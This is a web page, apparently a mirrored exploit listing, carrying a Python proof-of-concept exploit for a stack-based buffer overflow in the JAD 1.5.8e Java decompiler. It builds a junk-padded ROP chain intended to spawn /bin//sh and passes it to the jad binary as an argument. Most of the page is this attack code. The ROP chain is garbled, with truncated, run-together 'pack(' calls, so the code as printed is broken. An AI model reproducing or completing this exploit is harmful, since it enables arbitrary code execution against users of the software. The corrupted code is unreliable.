JAD 1.5.8e-1kali1 Buffer Overflow
34216133623428476
أخبار ساخنة

JAD 1.5.8e-1kali1 Buffer Overflow

الخط

JAD version 1.5.8e-1kali1 suffers from a buffer overflow vulnerability.


MD5 | 2b1879456767fcc7e710df4a24db0153

#!/usr/bin/python
# Exploit Author: Juan Sacco at KPN Red Team -
http://www.kpn.com
# Developed using Exploit Pack - http://exploitpack.com -

# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is
prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
boundary-checks on user-supplied input.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Package details:
# Version: 1.5.8e-1kali1
# Architecture: all
# Maintainer: Devon Kearns
#
# Vendor homepage: http://www.varaneckas.com/jad/
#
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : disabled
#
import os, subprocess
from struct import pack

ropchain = "A"*8150 # junk
ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += '/bin'
ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += '//sh'
ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ebx ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('edi ; pop ebp ; ret
ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('ropchain += pack('
try:
print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["jad", ropchain])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "JAD not found!"
else:
print "Error executing exploit"
raise

نموذج الاتصال
الاسمبريد إلكترونيرسالة